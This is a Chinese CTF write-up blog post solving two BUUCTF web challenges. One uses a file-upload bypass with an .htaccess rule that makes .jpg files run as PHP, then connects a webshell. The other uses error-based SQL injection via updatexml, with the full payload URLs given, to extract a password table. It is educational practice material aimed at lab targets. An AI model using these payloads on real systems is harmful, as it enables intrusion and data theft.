BUUCTF Web [MRCTF2020]你传你呢1 & [极客大挑战 2019]HardSQL1

[MRCTF2020]你传你🐎呢1

启动靶机,熟悉的游戏和背锅侠

发现文件上传点,开始上传shell.php

 

看来是有过滤,先尝试黑名单绕过

 看来不行,再尝试一下图片马

看来是成功了,但jpg无法解析成php代码,再尝试上传一个.htaccess为后缀的文件,新建.htaccess,写入

AddType application/x-httpd-php .jpg

把content-type改成image/jpeg 

  上传完.htaccess后,直接访问我们的tupianma.jpg

 尝试蚁剑连接

拿到flag                    flag{305c6833-434e-4488-ad8b-1f5c2e38f293} 

[极客大挑战 2019]HardSQL1

启动靶机

 熟悉的页面,先试试万能密码,不行。再试试union查询,不行。再试试报错注入,好像可以。

1.爆出库名

/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123

2.爆出表名

/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123

 3.爆出列名

/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=123

4.构造最后查询语句

报错回显有位数限制,所以查找两次

/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((left(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123

/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123

 把两个拼一拼

拿到flag               flag{69c80e46-b068-4cb6-b682-d8017ce943d0}

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

WmVicmE=

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值